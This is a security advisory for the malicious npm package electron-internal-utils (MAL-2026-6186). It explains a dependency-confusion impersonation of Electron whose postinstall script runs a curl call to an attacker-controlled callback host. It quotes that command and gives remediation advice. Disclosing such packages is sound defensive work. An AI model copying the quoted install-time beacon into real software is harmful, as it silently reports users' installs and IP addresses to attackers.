VYPR

npm · Malicious package advisory

Malware

electron-internal-utils

MAL-2026-6186

Malicious code in electron-internal-utils (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e07ff16a8f4a44a8ccfc2f6f2a91eee6dbd3d1de9f1c4d6ca95e0e48999202ef)
On npm install, package.json's postinstall script executes `curl http://9ph8dp.ceye.io`, an out-of-band DNS/HTTP interaction service controlled by the package author. The callback signals the attacker that the package was installed on the host and leaks the installer's public IP and DNS resolver metadata. The package ships no functionality (index.js contains only `module.exports = {};`) and its name impersonates the Electron project's internal-utilities namespace, consistent with a dependency-confusion attack against projects that reference internal Electron helpers. Any environment that runs `npm install` on this package will silently beacon to attacker-controlled infrastructure.

Compromised versions (1)

  • 1.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.